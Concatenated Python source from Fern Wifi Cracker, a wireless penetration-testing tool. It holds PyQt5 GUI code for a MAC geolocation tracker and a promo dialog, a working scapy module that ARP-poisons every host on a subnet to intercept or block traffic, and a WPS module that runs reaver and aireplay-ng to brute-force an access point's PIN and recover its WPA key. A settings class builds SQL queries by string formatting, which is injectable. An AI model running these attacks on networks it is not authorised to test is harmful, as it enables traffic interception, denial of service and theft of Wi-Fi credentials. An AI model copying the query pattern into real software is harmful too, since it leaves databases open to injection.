        self.longitude_label = QtWidgets.QLabel(self.groupBox)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.longitude_label.setFont(font)
        self.longitude_label.setObjectName(_fromUtf8("longitude_label"))
        self.verticalLayout_3.addWidget(self.longitude_label)
        spacerItem12 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_3.addItem(spacerItem12)
        self.street_label = QtWidgets.QLabel(self.groupBox)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.street_label.setFont(font)
        self.street_label.setObjectName(_fromUtf8("street_label"))
        self.verticalLayout_3.addWidget(self.street_label)
        self.horizontalLayout.addLayout(self.verticalLayout_3)
        spacerItem13 = QtWidgets.QSpacerItem(29, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem13)
        self.verticalLayout_2 = QtWidgets.QVBoxLayout()
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        self.accuracy_label = QtWidgets.QLabel(self.groupBox)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.accuracy_label.setFont(font)
        self.accuracy_label.setObjectName(_fromUtf8("accuracy_label"))
        self.verticalLayout_2.addWidget(self.accuracy_label)
        spacerItem14 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_2.addItem(spacerItem14)
        self.country_code_label = QtWidgets.QLabel(self.groupBox)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.country_code_label.setFont(font)
        self.country_code_label.setObjectName(_fromUtf8("country_code_label"))
        self.verticalLayout_2.addWidget(self.country_code_label)
        self.horizontalLayout.addLayout(self.verticalLayout_2)
        spacerItem15 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem15)
        self.verticalLayout_5.addWidget(self.groupBox)
        self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
        self.label = QtWidgets.QLabel(fern_geotrack)
        self.label.setText(_fromUtf8(""))
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout_5.addWidget(self.label)
        spacerItem16 = QtWidgets.QSpacerItem(220, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_5.addItem(spacerItem16)
        self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        self.track_button = QtWidgets.QPushButton(fern_geotrack)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.track_button.sizePolicy().hasHeightForWidth())
        self.track_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.track_button.setFont(font)
        icon1 = QtGui.QIcon()
        icon1.addPixmap(QtGui.QPixmap(_fromUtf8("world.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.track_button.setIcon(icon1)
        self.track_button.setIconSize(QtCore.QSize(24, 29))
        self.track_button.setObjectName(_fromUtf8("track_button"))
        self.horizontalLayout_3.addWidget(self.track_button)
        spacerItem17 = QtWidgets.QSpacerItem(19, 38, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout_3.addItem(spacerItem17)
        self.horizontalLayout_5.addLayout(self.horizontalLayout_3)
        spacerItem18 = QtWidgets.QSpacerItem(277, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_5.addItem(spacerItem18)
        self.verticalLayout_5.addLayout(self.horizontalLayout_5)

        self.retranslateUi(fern_geotrack)
        QtCore.QMetaObject.connectSlotsByName(fern_geotrack)

    def retranslateUi(self, fern_geotrack):
        fern_geotrack.setWindowTitle(QtWidgets.QApplication.translate("fern_geotrack", "Fern - Mac Geolocatory Tracker", None, 0))
        self.database_radio.setText(QtWidgets.QApplication.translate("fern_geotrack", "Use Database addresses", None, 0))
        self.insert_mac_radio.setText(QtWidgets.QApplication.translate("fern_geotrack", "Insert Mac Address", None, 0))
        self.mac_address_label.setText(QtWidgets.QApplication.translate("fern_geotrack", "Mac Address: ", None, 0))
        self.country_label.setText(QtWidgets.QApplication.translate("fern_geotrack", "Country: ", None, 0))
        self.latitude_label.setText(QtWidgets.QApplication.translate("fern_geotrack", "Latitude: ", None, 0))
        self.city_label.setText(QtWidgets.QApplication.translate("fern_geotrack", "City: Lagos", None, 0))
        self.longitude_label.setText(QtWidgets.QApplication.translate("fern_geotrack", "Longitude: ", None, 0))
        self.street_label.setText(QtWidgets.QApplication.translate("fern_geotrack", "Street: ", None, 0))
        self.accuracy_label.setText(QtWidgets.QApplication.translate("fern_geotrack", "Accuracy: ", None, 0))
        self.country_code_label.setText(QtWidgets.QApplication.translate("fern_geotrack", "Country Code: ", None, 0))
        self.track_button.setText(QtWidgets.QApplication.translate("fern_geotrack", "Track", None, 0))



# -*- coding: utf-8 -*-

#
# Created: Thu Aug 07 19:58:03 2014
#      by: PyQt5 UI code generator 4.10.1
#
# WARNING! All changes made in this file will be lost!
import os
from PyQt5.QtWidgets import *
from gui.main_window import font_size
from PyQt5 import QtCore, QtWidgets, QtGui

font_setting = font_size()

try:
    _encoding = 0
    def _translate(context, text, disambig):
        return QtCore.QCoreApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtCore.QCoreApplication.translate(context, text, disambig)

class Fern_Pro_Tip_ui(object):
    def setupUi(self, Dialog):
        Dialog.setObjectName("Dialog")
        Dialog.resize(413, 188)
        self.verticalLayout_3 = QtWidgets.QVBoxLayout(Dialog)
        self.verticalLayout_3.setObjectName("verticalLayout_3")
        self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_3.setObjectName("horizontalLayout_3")
        self.label_2 = QtWidgets.QLabel(Dialog)
        self.label_2.setText("")
        self.label_2.setPixmap(QtGui.QPixmap("%s/resources/fern_pro.png"%(os.getcwd())))
        self.label_2.setObjectName("label_2")
        self.horizontalLayout_3.addWidget(self.label_2)
        self.verticalLayout_2 = QtWidgets.QVBoxLayout()
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setObjectName("verticalLayout")
        spacerItem = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout.addItem(spacerItem)
        self.label = QtWidgets.QLabel(Dialog)
        self.label.setObjectName("label")
        self.verticalLayout.addWidget(self.label)
        self.label_3 = QtWidgets.QLabel(Dialog)
        self.label_3.setObjectName("label_3")
        self.verticalLayout.addWidget(self.label_3)
        self.verticalLayout_2.addLayout(self.verticalLayout)
        spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_2.addItem(spacerItem1)
        self.horizontalLayout_3.addLayout(self.verticalLayout_2)
        self.verticalLayout_3.addLayout(self.horizontalLayout_3)
        spacerItem2 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout_3.addItem(spacerItem2)
        self.show_message_checkbox = QtWidgets.QCheckBox(Dialog)
        self.show_message_checkbox.setObjectName("show_message_checkbox")
        self.verticalLayout_3.addWidget(self.show_message_checkbox)
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem3)
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.yes_button = QtWidgets.QPushButton(Dialog)
        self.yes_button.setObjectName("yes_button")
        self.horizontalLayout.addWidget(self.yes_button)
        self.no_button = QtWidgets.QPushButton(Dialog)
        self.no_button.setObjectName("no_button")
        self.horizontalLayout.addWidget(self.no_button)
        self.horizontalLayout_2.addLayout(self.horizontalLayout)
        self.verticalLayout_3.addLayout(self.horizontalLayout_2)

        self.retranslateUi(Dialog)
        self.no_button.clicked.connect(Dialog.close)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        Dialog.setWindowTitle(_translate("Dialog", "Fern Professional", None))
        self.label.setText(_translate("Dialog", "A professional version of Fern Wifi Cracker is now available", None))
        self.label_3.setText(_translate("Dialog", "Would you like to visit the website?", None))
        self.show_message_checkbox.setText(_translate("Dialog", "Don\'t show this message again", None))
        self.yes_button.setText(_translate("Dialog", "Yes", None))
        self.no_button.setText(_translate("Dialog", "No", None))




#-------------------------------------------------------------------------------
# Name:        MITM Core (Man In The Middle)
# Purpose:     Redirecting Network traffic to attack host by various MITM engines
#
# Author:      Saviour Emmanuel Ekiko
#
# Created:     15/08/2012
# Copyright:   (c) Fern Wifi Cracker 2011
# Licence:     <GNU GPL v3>
#
#
#-------------------------------------------------------------------------------
# GNU GPL v3 Licence Summary:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.


import os
import time
import subprocess
import threading

from scapy.all import *

class Fern_MITM_Class:

    class ARP_Poisoning(object):
        def __init__(self):
            self._attack_option = str()                 # "ARP POISON" or "ARP POISON + ROUTE" or "DOS"
            self.interface_card = str()                 # eth0, wlan0
            self.gateway_IP_address = str()             # Router or default gateway address
            self._gateway_MAC_addr = str()              # Router Mac Address, set by _set_Gateway_MAC()
            self.subnet_hosts = {}                      # Holds IP Address to Mac Address Mappings of Subnet Hosts e.g {"192.168.0.1":"00:C0:23:DF:87"}
            self.control = True                         # Used to control the processes. if False -> Stop
            self.semaphore = threading.BoundedSemaphore(15)
            self._local_mac = str()                     # Mac address for interface card
            self._local_IP_Address = str()              # IP address for interface card


        def ARP_Who_Has(self,target_ip_address):
            '''Send ARP request, remote host returns its MAC Address'''
            ethernet = Ether(dst = "ff:ff:ff:ff:ff:ff",src = self._local_mac)
            arp_packet = ARP(hwtype = 0x1,ptype = 0x800,hwlen = 0x6,plen = 0x4,
            op = "who-has",hwsrc = self._local_mac,psrc = self._local_IP_Address,hwdst =
            "00:00:00:00:00:00",pdst = target_ip_address)
            padding_packet = Padding(load = "\x00"*18)
            ARP_who_has_packet = ethernet/arp_packet/padding_packet
            return(ARP_who_has_packet)


        def ARP_Is_At(self,ip_address,target_mac_address):
            '''Poisons Cache with fake target mac address'''
            ethernet = Ether(dst = 'ff:ff:ff:ff:ff:ff',src = self._local_mac)
            arp_packet = ARP(hwtype = 0x1,ptype = 0x800,hwlen = 0x6,plen = 0x4,
            op = "is-at",hwsrc = self._local_mac,psrc = self.gateway_IP_address,hwdst =
            'ff:ff:ff:ff:ff:ff',pdst = ip_address)
            padding_packet = Padding(load = "\x00"*18)
            ARP_is_at_packet = ethernet/arp_packet/padding_packet
            return(ARP_is_at_packet)


        def _gateway_MAC_Probe(self):
            '''_set_Gate_Mac worker, runs thread that
                sends and ARP who as packet to fecth gateway mac'''
            while(self.control):
                packet = self.ARP_Who_Has(self.gateway_IP_address)
                sendp(packet,iface = self.interface_card)
                if(self._gateway_MAC_addr):
                    break
                time.sleep(3)



        def _set_Gateway_MAC(self):
            '''Fetches the Gateway MAC address'''
            self._gateway_MAC_addr = str()
            threading.Thread(target=self._gateway_MAC_Probe).start()
            while not self._gateway_MAC_addr:
                reply = sniff(filter = "arp",count = 2)[1]
                if(reply.haslayer(ARP)):
                    if((reply.op == 0x2) and (reply.psrc == self.gateway_IP_address)):
                        self._gateway_MAC_addr = reply.hwsrc
                        break


        def _network_Hosts_Probe(self):
            '''ARP sweep subnet for available hosts'''
            while(self.control):
                segment = int(self.gateway_IP_address[:self.gateway_IP_address.index(".")])
                if segment in range(1,127):                                 # Class A IP address
                    address_func = self.class_A_generator
                elif segment in range(128,191):                             # Class B IP address
                    address_func = self.class_B_generator
                else:                                                       # Class C IP address
                    address_func = self.class_C_generator

                for address in address_func(self.gateway_IP_address):
                    if not self.control:
                        return
                    time.sleep(0.01)
                    packet = self.ARP_Who_Has(address)
                    sendp(packet,iface = self.interface_card)               # Send Who has packet to all hosts on subnet

                time.sleep(30)



        def _get_Network_Hosts_Worker(self,reply):
            '''thread worker for the _get_Netword_Host method'''
            self.semaphore.acquire()
            try:
                if(reply.haslayer(ARP)):
                    if((reply.op == 0x2) and (reply.hwsrc != self._local_mac)):
                        if not self.subnet_hosts.has_key(reply.hwsrc):
                            if(str(reply.hwsrc) != str(self._gateway_MAC_addr)):
                                self.subnet_hosts[reply.psrc] = reply.hwsrc
            finally:
                self.semaphore.release()


        def _get_Network_Hosts(self):
            '''Receives ARP is-at from Hosts on
                the subnet'''
            packet_count = 1
            threading.Thread(target=self._network_Hosts_Probe).start()
            sniff(filter = "arp",prn = self._get_Network_Hosts_Worker,store = 0)


        def _poison_arp_cache(self):
            '''Poisions ARP cache of detected Hosts'''
            while(self.control):
                for ip_address in self.subnet_hosts.keys():
                    packet = self.ARP_Is_At(ip_address,self.subnet_hosts[ip_address])
                    sendp(packet,iface = self.interface_card)
                time.sleep(5)


        def _redirect_network_traffic_worker(self,routed_data):
            ''' Thread worker for the _redirect_network_traffic() method'''
            self.semaphore.acquire()
            try:
                if(routed_data.haslayer(Ether)):
                    if(routed_data.getlayer(Ether).dst == self._local_mac):
                        routed_data.getlayer(Ether).dst = self._gateway_MAC_addr
                        sendp(routed_data,iface = self.interface_card)
            finally:
                self.semaphore.release()


        def _redirect_network_traffic(self):
            '''Redirect traffic to the Gateway Address'''
            sniff(prn = self._redirect_network_traffic_worker,store = 0)



        def Start_ARP_Poisoning(self,route_enabled = True):
            '''Start ARP Poisoning Attack'''
            self.control = True
            self._local_mac = self.get_Mac_Address(self.interface_card).strip()
            self._local_IP_Address = self.get_IP_Adddress()
            self._set_Gateway_MAC()
            threading.Thread(target=self._get_Network_Hosts).start()               # Get all network hosts on subnet
            if(route_enabled):
                threading.Thread(target=self._redirect_network_traffic).start()      # Redirect traffic to default gateway
            self._poison_arp_cache()                                            # Poison the cache of all network hosts


        def stop(self):
            self.control = False

    #################### OS NETWORKING FUNCTIONS #####################

        def get_Mac_Address(self,interface):
            sys_net = "/sys/class/net/" + interface + "/address"
            addr = open(sys_net,"r")
            mac_addr = addr.read()
            addr.close()
            return(mac_addr)


        def get_IP_Adddress(self):
            import re
            regex = r"inet addr:((\d+.){3}\d+)"
            sys_out = subprocess.getstatusoutput("ifconfig " + self.interface_card)[1]
            result = re.findall(regex,sys_out)
            if(result):
                return(result[0][0])
            return("0.0.0.0")



        def class_A_generator(self,address):
            '''Generates CIDR class A adresses'''
            #/8  Class A address host range = pow(2,24) -2
            mod = address.index('.')
            address = address[:mod] + '.%d' * 3
            for first_octect in range(255):
                for second_octect in range(255):
                    for third_octect in range(255):
                        yield(address % (first_octect,\
                        second_octect,third_octect))

        def class_B_generator(self,address):
            '''Generates CIDR class B adresses'''
            #/16 Class B address host range = pow(2,16) -2
            mod = address.rindex('.')
            address = address[:address[0:mod].rindex('.')] + '.%d'*2
            for first_octect in range(255):
                for second_octect in range(255):
                    yield(address % (\
                    first_octect,second_octect))


        def class_C_generator(self,address):
            '''Generates CIDR class C adresses'''
            #/24 Class C address host range = pow(2,8) -2
            process = address.rindex('.')
            address = address[:process] + '.%d'
            for octect in range(255):
                yield(address % octect)


    #################### OS NETWORKING FUNCTIONS END ########################


        def set_Attack_Option(self,option):
            '''"ARP POISON" or "ARP POISON + ROUTE" or "DOS"'''
            self._attack_option = option


        def run_attack(self):
            attack_options = ["ARP POISON","ARP POISON + ROUTE","DOS"]

            if(self._attack_option == "ARP POISON"):
                self.Start_ARP_Poisoning(False)
            if(self._attack_option == "ARP POISON + ROUTE"):
                self.Start_ARP_Poisoning(True)
            if(self._attack_option == "DOS"):
                self.Start_ARP_Poisoning(False)
            if(self._attack_option == str()):
                raise Exception("Attack Type has not been set")
            if(self._attack_option not in attack_options):
                raise Exception("Invalid Attack Option")



#instance = Fern_MITM_Class.ARP_Poisoning()

#instance.interface_card = os.environ["interface_card"]
#instance.gateway_IP_address = os.environ["gateway_ip_address"]

#instance.set_Attack_Option("ARP POISON + ROUTE")
#instance.run_attack()



# Usage:

# instance = Fern_MITM_Class.ARP_Poisoning()

# instance.interface_card = "eth0"
# instance.gateway_IP_address = "192.168.133.1"

# instance.set_Attack_Option("ARP POISON + ROUTE")
# instance.start()

# instance.stop()






#-------------------------------------------------------------------------------
# Name:        WPS Core
# Purpose:     For WPS Attacks using the (Reaver) tool
#
# Author:      Saviour Emmanuel Ekiko
#
# Created:     03/09/2012
# Copyright:   (c) Fern Wifi Cracker 2012
# Licence:     <GNU GPL v3>
#
#
#-------------------------------------------------------------------------------
# GNU GPL v3 Licence Summary:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import re
import time
import threading
import subprocess
import webbrowser

from PyQt5 import QtCore

class WPS_Attack(QtCore.QThread):
    Bruteforcing_WPS_Device_signal = QtCore.pyqtSignal()
    WPS_Progress_signal = QtCore.pyqtSignal()
    Cracked_WPS_Pin_signal = QtCore.pyqtSignal()
    Cracked_WPS_Key_signal = QtCore.pyqtSignal()
    Associating_with_WPS_device_signal = QtCore.pyqtSignal()

    def __init__(self):
        QtCore.QThread.__init__(self)
        self.monitor_interface = str()      # Monitor Interface used for scanning
        self.monitor_mac_address = str()    # MAC Address of monitor interface
        self.victim_MAC_Addr = str()        # Victim Access Point MAC Address
        self.progress = str()               # Progress as in 40%
        self._scan_control = True           # For stopping scanning processes
        self._attack_control = True         # For stopping WPS attacks
        self._associate_flag = False        # False if not associated with WPS access point
        self.bruteforce_sys_proc = object   # Bruteforce object (type() == subprocess)
        self._wps_clients = []              # for holding the mac addresses of WPS enabled Access Points
        self._wps_client_info = {}          # for holding mac address information with channel

        self._wps_pin = str()               # Used by the get_keys() method for process keys
        self._final_key = str()

        self.reaver_link = "http://code.google.com/p/reaver-wps/downloads/list"


    def reaver_Installed(self):
        '''Checks if the reaver tool is installed'''
        sys_proc_a = "which reaver"
        sys_proc_b = "which wash"
        return_code_1 = subprocess.getstatusoutput(sys_proc_a)[0]
        return_code_2 = subprocess.getstatusoutput(sys_proc_b)[0]

        if(bool(return_code_1 or return_code_2)):
            return(False)
        return(True)


    def is_WPS_Device(self,ap_mac_addr):
        '''Checks if Device is WPS enabled'''
        if(ap_mac_addr.upper() in self._wps_clients):
            return(True)
        if(ap_mac_addr.lower() in self._wps_clients):
            return(True)
        return(False)


    def browse_Reaver_Link(self):
        webbrowser.open(self.reaver_link)


    ################### ATTACK AND SCAN SECTION ##########################

    def _scan_WPS_Devices_Worker(self):
        regex = re.compile("([0-9a-f]{2}:){5}[0-9a-f]{2}",re.IGNORECASE)
        sys_proc = subprocess.Popen("sudo wash -i %s -C" % (self.monitor_interface) ,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
        sys_file = sys_proc.stdout
        while(self._scan_control):
            response = sys_file.readline()
            if(regex.match(str(response))):
                information = response.split()
                MAC_Address = information[0].upper()
                Channel = information[1]
                is_WPS_Locked = information[4].upper()
                if(is_WPS_Locked == 'NO'):
                    self._wps_clients.append(MAC_Address)
                    self._wps_client_info[MAC_Address] = Channel



    def _associate_WPS_Device_Aireplay(self):
        t = threading.Thread(target=self._start_Airodump)
        t.start()
        time.sleep(2)
        while(self._attack_control):
            subprocess.Popen('aireplay-ng -1 0 -a %s -h %s %s'%(self.victim_MAC_Addr,self.monitor_mac_address,self.monitor_interface),shell=True,
            stdout=subprocess.PIPE,stderr=subprocess.PIPE)
            time.sleep(2)
            if(self._associate_flag):
                return



    def _start_Airodump(self):
        subprocess.Popen("airodump-ng -c %s %s" % (self._wps_client_info[self.victim_MAC_Addr.upper()],self.monitor_interface),
        shell=True,cwd="/tmp/",stdout=subprocess.PIPE,stderr=subprocess.PIPE)


    def _bruteforce_WPS_Device(self):
        channel = self._wps_client_info[self.victim_MAC_Addr.upper()]
        wps_key_regex = re.compile(r": '(\S+)'",re.IGNORECASE)
        wps_pin_regex = re.compile(r"WPS PIN: '(\d+)'",re.IGNORECASE)
        progress_regex = re.compile(r"(\d+\.\d+)%",re.IGNORECASE)
        associate_regex = re.compile("associated with",re.IGNORECASE)

        self.bruteforce_sys_proc = subprocess.Popen("reaver -i %s -b %s -c %s -a -N -L" %(self.monitor_interface,self.victim_MAC_Addr,channel),
        shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
        self.bruteforce_sys_proc.stdin.write('y')                   # Restore previous session if any
        sys_file = self.bruteforce_sys_proc.stdout

        while(self._attack_control):
            responce = sys_file.readline()
            if(associate_regex.findall(str(responce))):
                self._associate_flag = True
                self.Bruteforcing_WPS_Device_signal.emit()

            information = progress_regex.findall(str(responce))
            if(bool(information)):
                self.progress = information[0]
                self.WPS_Progress_signal.emit()
                self._associate_flag = True

            wps_pin = wps_pin_regex.findall(str(responce))
            if(bool(wps_pin)):
                self._wps_pin = wps_pin[0]
                self.Cracked_WPS_Pin_signal.emit()

            wps_key = wps_key_regex.findall(str(responce))
            if(bool(wps_key)):
                if(str(wps_key[0]) != str(self._wps_pin)):
                    self._final_key = wps_key[0]
                    self.Cracked_WPS_Key_signal.emit()
                    return


    def get_keys(self):
        keys = tuple([self._wps_pin,self._final_key])
        return(keys)


    def is_Attack_Finished(self):
        if(bool(self._final_key)):
            return(True)
        if(bool(self._wps_pin)):
            return(True)
        return(False)


    def start_Attack_WPS_Device(self):
        self._attack_control = True
        self._final_key = str()
        self._wps_pin = str()
        self._associate_flag = False
        self.Associating_with_WPS_device_signal.emit()
        t = threading.Thread(target=self._associate_WPS_Device_Aireplay)
        t.start()
        time.sleep(3)
        self._bruteforce_WPS_Device()


    def stop_Attack_WPS_Device(self):
        self._attack_control = False
        self.bruteforce_sys_proc.kill                       # Save bruteforce session on keyboradinterrupt (CTRL - C)
        subprocess.Popen("killall aireplay-ng",shell=True)
        subprocess.Popen("killall reaver",shell=True)
        subprocess.Popen("killall airodump-ng",shell=True)


    def start_WPS_Devices_Scan(self):
        self._scan_control = True
        t = threading.Thread(target=self._scan_WPS_Devices_Worker)
        t.start()


    def stop_WPS_Scanning(self):
        self._scan_control = False
        subprocess.Popen("killall wash",shell=True)


    def run(self):
        self.start_Attack_WPS_Device()




# Usage

# instance = WPS_Attack()

# instance.monitor_interface = "mon0"
# instance.monitor_mac_address = "00:CA:56:C4:09:A1"

# instance.victim_MAC_Addr = "00:E5:56:C4:09:C3"
# print(instance.progress)                          # Percentage progress e.g 20%
# instance.start_WPS_Devices_Scan()

# instance.start()

# if(instance.is_Attack_Finished()):
#    print(instance.get_keys())                     # (123456789,"my_wpa_password")

# instance.terminate()





import os
import sqlite3


class Fern_settings(object):
    def __init__(self):
        self.cwd = os.getcwd()
        self._create_settings_directory()
        self.settings_file = "key-database/Database.db"
        self.settings_object = sqlite3.connect(self.settings_file)
        self.cursor_object = self.settings_object.cursor()
        self.create_table()

    def __del__(self):
        self.close_setting_file()


    def _create_settings_directory(self):
        if not os.path.exists(self.cwd + os.sep + "Settings"):
            os.mkdir(self.cwd + os.sep + "Settings")


    def create_table(self):
        self.cursor_object.execute("create table if not exists settings (object text,value text)")
        self.settings_object.commit()


    def create_settings(self,object_name,value):
        ''' This function reads the settings file for already
            existing variables, and if they are any conflicting
            variable, it removes it and replaces it
            with the new
        '''
        if self.setting_exists(object_name):
            self.cursor_object.execute("update settings set value = '%s' where object = '%s'" % (value,object_name))
        else:
            self.cursor_object.execute("insert into settings values ('%s','%s')" % (object_name,value))
        self.settings_object.commit()


    def setting_exists(self,object_name):
        '''This function checks to see if queried
            settings exists in shelve object
        '''
        self.cursor_object.execute("select value from settings where object = '%s'"%(object_name))
        fetch_value = self.cursor_object.fetchall()
        if(len(fetch_value) >= 1):
            return(True)
        return(False)


    def read_last_settings(self,object_name):
        ''' This function reads the settings for
            variable assignments and then
            returns the corresponding value
        '''
        self.cursor_object.execute("select value from settings where object = '%s'"%(object_name))
        fetch_value = self.cursor_object.fetchall()[0][0]
        return(fetch_value)


    def remove_settings(self,object_name):
        '''This function removes previously stored
            settings
        '''
        self.cursor_object.execute("delete from settings where object = '%s'"%(object_name))
        self.settings_object.commit()


    def close_setting_file(self):
        '''Function closes write/Read operations
            to settings file
        '''
        self.cursor_object.close()





